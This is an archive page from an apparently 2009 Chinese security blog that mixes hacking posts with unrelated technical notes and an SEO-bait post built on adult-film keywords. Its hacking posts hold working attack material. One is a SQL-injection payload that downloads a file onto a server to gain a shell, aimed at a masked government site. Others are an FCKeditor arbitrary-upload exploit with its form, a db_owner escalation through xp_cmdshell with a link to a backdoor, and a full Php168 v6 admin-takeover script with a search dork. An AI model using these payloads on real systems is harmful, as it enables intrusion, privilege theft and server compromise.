存档

‘技术文章’ 分类的存档

xml.http 下载拿SHELL

2009年7月24日 没有评论 88 views

注意以下语句在SA权限下执行,对于N多扩展存储过程被删除时使用效果最佳:

DECLARE
@B varbinary(8000),
@hr int,
@http INT,
@down INT
EXEC sp_oacreate [Microsoft.XMLHTTP],@http output ;EXEC @hr = sp_oamethod @http,[Open],null,[GET],[要下载的文件地址],0 ;EXEC @hr = sp_oamethod @http,[Send],null ;EXEC @hr=sp_OAGetProperty @http,[responseBody],@B output ;EXEC @hr=sp_oacreate [ADODB.Stream],@down output ;EXEC @hr=sp_OASetProperty @down,[Type],1 ;EXEC @hr=sp_OASetProperty @down,[mode],3 ;EXEC @hr=sp_oamethod @down,[Open],null ;EXEC @hr=sp_oamethod @down,[Write],null,@B ;EXEC @hr=sp_oamethod @down,[SaveToFile],null,[保存在服务器上的绝对路径],1 ;--
将以上代码修改后转化为十六进制。然后提交:
http://www.XXXX.gov.cn/XXX/hdsq/XXXXfo.jsp?ID=8 ;DECLARE @S VARCHAR(4000);SET @S=CAST(十六进制代码 AS VARCHAR(4000));EXEC(@S);--

分类: 技术文章 标签:

Fckeditor 2.4.2 php任意上传文件漏洞

2009年7月24日 没有评论 220 views

1、漏洞描述
    fckeditor/editor/filemanager/upload/php/upload.php

<?php
/*
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2007 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
*    http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
*    http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
*    http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* This is the "File Uploader" for PHP.
*/

require('config.php') ;
require('util.php') ;

// This is the function that sends the results of the uploading process.
function SendResults( $errorNumber, $fileUrl = '', $fileName = '', $customMsg = '' )
{
echo '<script type="text/javascript">' ;
echo 'window.parent.OnUploadCompleted(' . $errorNumber . ',"' . str_replace( '"', '\\"', $fileUrl ) . '","' . str_replace( '"', '\\"', $fileName ) . '", "' . str_replace( '"', '\\"', $customMsg ) . '") ;' ;
echo '</script>' ;
exit ;
}

// Check if this uploader has been enabled.
if ( !$Config['Enabled'] )
SendResults( '1', '', '', 'This file uploader is disabled. Please check the "editor/filemanager/upload/php/config.php" file' ) ;

// Check if the file has been correctly uploaded.
if ( !isset( $_FILES['NewFile'] ) || is_null( $_FILES['NewFile']['tmp_name'] ) || $_FILES['NewFile']['name'] == '' )
SendResults( '202' ) ;

// Get the posted file.
$oFile = $_FILES['NewFile'] ;

// Get the uploaded file name extension.
$sFileName = $oFile['name'] ;

// Replace dots in the name with underscores (only one dot can be there... security issue).
if ( $Config['ForceSingleExtension'] )
$sFileName = preg_replace( '/\\.(?![^.]*$)/', '_', $sFileName ) ;

$sOriginalFileName = $sFileName ;

// Get the extension.
$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
$sExtension = strtolower( $sExtension ) ;

// The the file type (from the QueryString, by default 'File').
$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;

// Check if it is an allowed type.
if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
    SendResults( 1, '', '', 'Invalid type specified' ) ;

// Get the allowed and denied extensions arrays.
$arAllowed = $Config['AllowedExtensions'][$sType] ;
$arDenied = $Config['DeniedExtensions'][$sType] ;

// Check if it is an allowed extension.
if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
SendResults( '202' ) ;

$sErrorNumber = '0' ;
$sFileUrl   = '' ;

// Initializes the counter used to rename the file, if another one with the same name already exists.
$iCounter = 0 ;

// Get the target directory.
if ( isset( $Config['UserFilesAbsolutePath'] ) && strlen( $Config['UserFilesAbsolutePath'] ) > 0 )
$sServerDir = $Config['UserFilesAbsolutePath'] ;
else
$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;

if ( $Config['UseFileType'] )
$sServerDir .= $sType . '/' ;

while ( true )
{
// Compose the file path.
$sFilePath = $sServerDir . $sFileName ;

// If a file with that name already exists.
if ( is_file( $sFilePath ) )
{
   $iCounter++ ;
   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
   $sErrorNumber = '201' ;
}
else
{
   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;

   if ( is_file( $sFilePath ) )
   {
    $oldumask = umask(0) ;
    chmod( $sFilePath, 0777 ) ;
    umask( $oldumask ) ;
   }

   if ( $Config['UseFileType'] )
    $sFileUrl = $Config["UserFilesPath"] . $sType . '/' . $sFileName ;
   else
    $sFileUrl = $Config["UserFilesPath"] . $sFileName ;

   break ;
}
}

SendResults( $sErrorNumber, $sFileUrl, $sFileName ) ;
?>

    fckeditor/editor/filemanager/upload/php/config.php

 

<?php
/*
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2007 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
*    http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
*    http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
*    http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* Configuration file for the PHP File Uploader.
*/

global $Config ;

// SECURITY: You must explicitelly enable this "uploader".
$Config['Enabled'] = false ;

// Set if the file type must be considere in the target path.
// Ex: /userfiles/image/ or /userfiles/file/
$Config['UseFileType'] = false ;

// Path to uploaded files relative to the document root.
$Config['UserFilesPath'] = '/userfiles/' ;

// Fill the following value it you prefer to specify the absolute path for the
// user files directory. Usefull if you are using a virtual directory, symbolic
// link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
// Attention: The above 'UserFilesPath' must point to the same directory.
$Config['UserFilesAbsolutePath'] = '' ;

// Due to security issues with Apache modules, it is reccomended to leave the
// following setting enabled.
$Config['ForceSingleExtension'] = true ;

$Config['AllowedExtensions']['File'] = array() ;
$Config['DeniedExtensions']['File']   = array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis') ;

$Config['AllowedExtensions']['Image'] = array('jpg','gif','jpeg','png') ;
$Config['DeniedExtensions']['Image'] = array() ;

$Config['AllowedExtensions']['Flash'] = array('swf','fla') ;
$Config['DeniedExtensions']['Flash'] = array() ;

?>

    问题主要是出在config.php文件中未对Media目录作白名单和黑名单的限制,大概是写漏了,因为在fckeditor/editor/filemanager/browser/default/connectors/php目录中的config.php文件对Media是有限制的。

<?php
/*
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2007 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
*    http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
*    http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
*    http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* Configuration file for the File Manager Connector for PHP.
*/

global $Config ;

// SECURITY: You must explicitelly enable this "connector". (Set it to "true").
$Config['Enabled'] = false ;


// Path to user files relative to the document root.
$Config['UserFilesPath'] = '/userfiles/' ;

// Fill the following value it you prefer to specify the absolute path for the
// user files directory. Usefull if you are using a virtual directory, symbolic
// link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
// Attention: The above 'UserFilesPath' must point to the same directory.
$Config['UserFilesAbsolutePath'] = '' ;

// Due to security issues with Apache modules, it is reccomended to leave the
// following setting enabled.
$Config['ForceSingleExtension'] = true ;

$Config['AllowedExtensions']['File'] = array() ;
$Config['DeniedExtensions']['File']   = array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis') ;

$Config['AllowedExtensions']['Image'] = array('jpg','gif','jpeg','png') ;
$Config['DeniedExtensions']['Image'] = array() ;

$Config['AllowedExtensions']['Flash'] = array('swf','fla') ;
$Config['DeniedExtensions']['Flash'] = array() ;

$Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
$Config['DeniedExtensions']['Media'] = array() ;

?>

    2、漏洞利用
    既然fckeditor/editor /filemanager/browser/default/connectors/php/config.php已经过滤了,那就只能利用 fckeditor/editor/filemanager/upload/php/config.php了。
    不过如果留意一下改配置文件,就能看到默认情况下“$Config['Enabled'] = false”,是不允许上传的;其次,看upload.php能发现,程序对上传文件夹作了比对,必须是Media,说明在windows下不影响,但在Linux下则必须是大写M的Media目录,如果是media则返回信息正常,但文件并未上传成功。
    自己写段上传脚本:

<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxx.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

    提交后查看源码就能看到上传文件的位置。
    3、漏洞修补
    最好用新版,要不就拷贝以下代码到config.php最后。

$Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
$Config['DeniedExtensions']['Media'] = array() ;
分类: 技术文章 标签: ,

针对Dbowner权限下的提权脚本(转)

2009年7月23日 没有评论 121 views

一个针对MMSQL 2000 下的提权脚本,Dbowner提权网络上大部分都是备份到启动项后通过重启服务器达到提权的目的.但效果并不理想.其实在MMSQL 中如果开启了 SQL Server Agent 服务的话可以通过低权限下建立帐户

代码:

EXEC sp_add_job @job_name = 'jktest', @enabled = 1, @delete_level = 1 EXEC sp_add_jobstep @job_name = 'jktest', @step_name = 'ExeC my sql', @subsystem = 'TSQL', @CommAnd = 'exeC master..xp_exeCresultSet N''seleCt ''''exeC master..xp_Cmdshell "<% =Serverdos%>>C:\jk.txt"'''''',N''Master''' EXEC sp_add_jobServer @job_name = 'jktest', @Server_name = '<%=Servername%>' EXEC sp_start_job @job_name = 'jktest'

其实这个方法早就有了,不过还没有特定的Dbowner提权脚本, 我简单的写了个脚本程序,方便使用.不过这个方法我已经在ASP.NET Web BackDoor中加入了这个功能. 下载地址: http://www.ahiec.net/ewebeditor/UploadFile/dbsql.rar

分类: 技术文章 标签:

无线Hacking必备工具

2009年7月23日 没有评论 218 views

无线Hacking必备工具(一)

有很多朋友问起,索性先写出来主要流行的,其它以后再补。

BackTrack
http://www.remote-exploit.org/backtrack.html 

SoftPerfect Network Scanner
http://www.softperfect.com/products/networkscanner/ 

Aircrack-ng
http://www.aircrack-ng.org 

TCPDump/Libpcap
http://www.tcpdump.org/ 

Microsoft Network Monitor
http://www.microsoft.com/DOWNLOADS/details.aspx?FamilyID=f4db40af-1e08-4a21-a26b-ec2f4dc4190d&displaylang=en 

DecaffeinatID
http://www.irongeek.com/i.php?page=security/decaffeinatid-simple-ids-arpwatch-for-windows
 
Cain
http://www.oxid.it/cain.html 

Ettercap
http://ettercap.sourceforge.net/ 

Wireshark
http://www.wireshark.org/ 

Wlan2eth
http://www.willhackforsushi.com/?page_id=79 

nm2lp
http://www.inguardians.com/tools/ 

NetworkMiner
http://sourceforge.net/projects/networkminer/  

NetStumbler
http://www.netstumbler.com/ 

Vistumbler
http://www.vistumbler.net/

InSSIDer
http://www.metageek.net/products/inssider  

Kismet
http://www.kismetwireless.net/ 

IGiGLE
http://www.irongeek.com/i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping 

Google Earth
http://earth.google.com/ 

WirelessKeyView
http://www.nirsoft.net/utils/wireless_key.html

Hotspotter
http://www.remote-exploit.org/codes_hotspotter.html 

Karma
http://wirelessdefence.org/Contents/KARMAMain.htm

分类: 技术文章 标签: ,

WordPress文章ID不连续的处理方法

2009年7月23日 1 条评论 137 views

也许你早就发现了,自己wordpress博客发表文章的时候前后两篇的ID居然不连续,会很容易发现,通常前后两篇文章的ID会差个2到3的,虽然说文章ID不连续并不影响什么,但或多或少的对博客作者心情会有点影响,我刚开始就觉得很纳闷,看着就很不爽。

后来发现,原来WordPress2.6及其以后的版本添加了一个Post Revisions的功能,该功能会保存同一篇博客日志的不同版本,同样的内容多次占用数据库,因此导致了文章ID的不连续,而且浪费数据库资源。解决问题的办法就是禁止这个功能。

只要你把以下介绍的三个处理方法都用上,保证ID就可以连续了。

首先,修改wp-config.php文件,在文件中增加一行define(’WP_POST_REVISIONS’, false); 。

其次,使用“禁用WordPress自动保存的插件——Disable Revisions”,Disable Revisions可以禁止WordPress2.6以后的Post Revisions问题从而不产生多余的文章版本。

Disable Revisions下载地址:http://wordpress.org/extend/plugins/disable-revisions/

最后,对于以前已经产生的数据库中的垃圾,我们用WP Cleaner 这个插件来搞定它,WP Cleaner可以起到搜索和批量删除不再需要的wordpress文 章修订版或草稿,减小数据库的空间的作用。该插件可以在你需要使用的时候开启,使用完后禁用,如果你一开始就已经使用上面的Disable Revisions插件,则可以不用安装该插件了。如果不是的话,装上这个插件,你就会发现有很多莫名其妙的文章在你的数据库里,都可以一并删除了,当 然,安全起见,删除前建议先备份mysql数据库。

WP Cleaner下载地址:http://www.jiangmiao.org/blog/c/wpcleaner

分类: 技术文章 标签:

masm编译及editplus命令

2009年7月22日 没有评论 198 views

1.设置环境变量

path中加入;d:\masm32\bin

2.编译连接命令

Ml /c /coff xx.asm

Link /subsystem:windows xx.obj yy.lib zz.res (普通PE文件)

Link /subsystem:console xx.obj yy.lib zz.res (控制台文件)

Link /subsystem:windows /dll /def:aa.def xx.obj yy.lib zz.res (DLL文件)
3.editplus中的设置
ml:
D:\masm32\bin\ml.exe
/c /coff $(FilePath)
$(FileDir)

link:
D:\masm32\bin\link.exe
/subsystem:windows $(FileNameNoExt).obj
$(FileDir)

run:
$(FileNameNoExt).exe
 
$(FileDir)

分类: 技术文章 标签: ,

架设WIN32汇编程序的开发环境

2009年7月22日 没有评论 170 views

1. 下载并安装Ultraedit

http://www.ultraedit.com/

我安装的版本是12.20b+1官方中文版,安装路径不重要。
 
2.下载并安装MASM

http://www.masm32.com/

我安装的是Version 9,安装路径为:D:\masm32
 
3.make工具

http://211.90.241.130:22366/view.asp?file=53

压缩包中有两个make工具
nmake.exe是Microsoft (R) Program Maintenance Utility   Version 1.50
make.exe是MAKE Version 4.0 Copyright (c) 1987, 1996 Borland International
这两个make工具所支持的Makefile语法和常用的选项大同小异。
把nmake.exe和make.exe解压到Masm32安装目录的bin子目录下。
 
4.编写一个用于设置环境变量的批处理文件var.bat
文件的内容如下:

阅读全文...

分类: 技术文章 标签: ,

漫谈安全产品与安全服务

2009年7月21日 没有评论 47 views

对于企业来说,到底是产品决定服务,还是服务决定产品?目前国内的安全市场比较混乱,随着安全行业逐渐被企业所重视,这很大一部分的功劳归功于黑客们,是他们让企业提高了安全意识,谁说 Hacker 都是反面的呢?对于安全厂商来说,没有黑客的攻击事件,安全厂商怎么去推他们的产品和服务呢?

从目前国内的安全市场来看,大大小小的安全公司不计其数,但大的厂家就那么几家,例如启明星辰、绿盟、安氏、天融信等等,而很多安全厂商又有多少是真正从用户的角度来考虑问题呢?目前各大安全厂商的做法都大致相同,都是由服务来推动产品。熟悉安全行业的朋友都知道,服务赚不了什么钱,而像启明这样规模的公司如果单纯靠服务来养活是完全不可能的,所以很多公司都由一个安全服务提供商转变为一个安全厂商。在安全行业刚起步时,很多公司还能遵循一定的职业守则,真正为用户所考虑,而随着竞争越来越激烈,很多公司已经渐渐转变了最初的思想。安全服务变得越来越廉价,服务只是用来推动产品的销售而已。

而近两年来,安全市场出现恶意竞争的行为。当一个客户发出安全招标书后,会邀请各大安全公司前来竞标。往往一个客户预算在 30 万的项目,有的公司竟然报到 5 万。这样会让用户感到很迷茫,这安全服务是怎么了?到底值多少钱?很多公司看中不是前期安全服务所能赚的钱,而是后期的安全建设过程中产品所带来的利润,产品所带来的利润远远比服务要多的多,这也是近年来很多公司都开始研发产品的原因。

纵观目前国内的安全市场,各种各样的产品不计其数,IDS、IPS、UTM、日志审计、桌面管理、安全网关等等,让用户都觉得这么多种类的安全产品,对企业来说就真的都需要么?

从用户的角度来看,产品只是为了方便管理,提高企业的安全性而已,而安全服务只是用来帮助企业发现自身存在的安全隐患。不管是产品还是服务,对于企业来说最终的目的只有一个那就是提高安全性,降低风险。从资金投入角度来讲,企业应根据自身的实际情况来取舍,安全服务和产品到底谁的优先级跟高。

从企业的角度来看,产品的销售可以养活一个公司,可以为公司带来更多的利润,而安全服务只是用来销售产品的一种手段。很少有公司将安全服务作为企业的重点支柱。除了像 IBM、德勤、毕马威、普华永道这样的公司会为企业做专门的安全咨询或审计。从这些公司的情况来看,他们的安全咨询足以用来养活一个公司了。

所以总结来看,目前国内做中端市场的安全公司,多以产品为主,服务为辅。做高端市场的安全咨询公司,如四大这样的,都是以作安全咨询为主。但不管是偏向于做安全产品还是做安全咨询,还是应该真正从用户的角度出发,切实的帮助用户解决问题。这样带来的才是长期的利益。

分类: 技术文章 标签:

Php168 v6 权限提升漏洞

2009年7月21日 没有评论 80 views

 

by Ryat
http://www.wolvez.org
2009-07-17

天天上班,好久没在论坛发贴了...

以前发过一个php168 v2008的权限提升漏洞,这次的漏洞也出在相同的代码段
直接给出exp,里面的一些细节还是有些意思的,有兴趣的同学可以自行分析:)

EXP:

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Php168 v6.0 update user access exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168 V6.0"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass
host:      target server (ip/hostname)
path:      path to php168
user:      login username
pass:      login password
Example:
php '.$argv[0].' localhost /php168/ ryat 123456
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];

$resp = send();
preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);

if ($cookie)
    if (strpos(send(), 'puret_t') !== false)
        exit("Expoilt Success!\nYou Are Admin Now!\n");
    else
        exit("Exploit Failed!\n");
else
    exit("Exploit Failed!\n");

function rands($length = 8)
{
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    mt_srand((double)microtime() * 1000000);
    for ($i = 0; $i < $length; $i++)
        $hash .= $chars[mt_rand(0, $max)];

    return $hash;
}

function send()
{
    global $host, $path, $user, $pass, $cookie;

    if ($cookie) {
        $cookie[1] .= ';USR='.rands()."\t31\t\t";
        $cmd = 'memberlevel[8]=1&memberlevel[9]=1&memberlevel[3,introduce%3D0x70757265745f74]=-1';

        $message = "POST ".$path."member/homepage.php?uid=$cookie[2]  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n";
        $message .= "Cookie: ".$cookie[1]."\r\n\r\n";
        $message .= $cmd;
    } else {
        $cmd = "username=$user&password=$pass&step=2";

        $message = "POST ".$path."do/login.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;
    }

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>

分类: 技术文章 标签:

松岛枫、武藤兰电影全集 BT 下载

2009年7月21日 5 条评论 73,638 views

请注意本文完全出于 SEO 不喜欢的可以略过!同时也是本站的第一个 SEO 实验,稍后我会在文章中透露实验的结果。各位不要想歪了哈。

之所以选择松岛枫和武藤兰这两个关键词,是我在 Google 趋势上经过仔细思分析后的结果,用了一个小时的时间最终从众多日本 AV 女优中选出了在中国搜索量前五位的 AV 明星:武藤兰、松岛枫、小泽玛利亚、苍井空和爱田由。
武藤兰虽然趋势指数很高,但是从上图中可以看出关键词的流行度正在走下坡路,而松岛枫在韩寒事件的推动下在中国的人气不断攀升。

标题的选择对于 SEO 来说非常重要,通常热度高的关键词不容易做出排名,所以我决定避其锋芒,选择类似松岛枫全集 BT 下载、武藤兰电影 BT 下载之类的扩展关键词,于是就有了“松岛枫、武藤兰电影全集 BT 下载”这样的标题。

关键词的密度当然也要控制在合理的水平,经过我周密的统计,本文的主要关键词密度都控制在合理的范围之内:武藤兰和松岛枫的密度均为1.5%左右。

剩下的就是 Meta 标签的写法,由于搜索引擎对 Keywords 标签已经不是非常之感冒,所以这个标签我只写下了:日本 AV 女优、松岛枫全集 BT 下载

分类: 技术文章 标签: , ,

vs2003到2008各版本

2009年7月20日 没有评论 170 views

vs2003到2008各版本如下:

vs.net2003

Visual Studio .NET 2003 Enterprise Architect

Visual Studio .NET 2003 Enterprise Developer

Visual Studio .NET 2003 Professional

VS2005

Visual Studio 2005 Professional

Visual Studio 2005 Standard

Visual Studio 2005 Team Edition for Database Professionals

Visual Studio 2005 Team Edition for Software Architects

Visual Studio 2005 Team Edition for Software Developers

Visual Studio 2005 Team Edition for Software Testers

Visual Studio 2005 Team Suite

VS2008

Visual Studio 2008 Express Editions

Visual Studio 2008 Professional Edition

Visual Studio 2008 Standard Edition

Visual Studio Team System 2008 Architecture Edition

Visual Studio Team System 2008 Database Edition

Visual Studio Team System 2008 Development Edition

Visual Studio Team System 2008 Team Suite

Visual Studio Team System 2008 Test Edition

Visual Studio Team System 2008 Test Load Agent

分类: 技术文章 标签:

彻底关闭445端口

2009年7月20日 没有评论 73 views

关闭

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
"TransportBindName"=""

打开

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
"TransportBindName"="\\Device\\"

重启生效

分类: 技术文章 标签: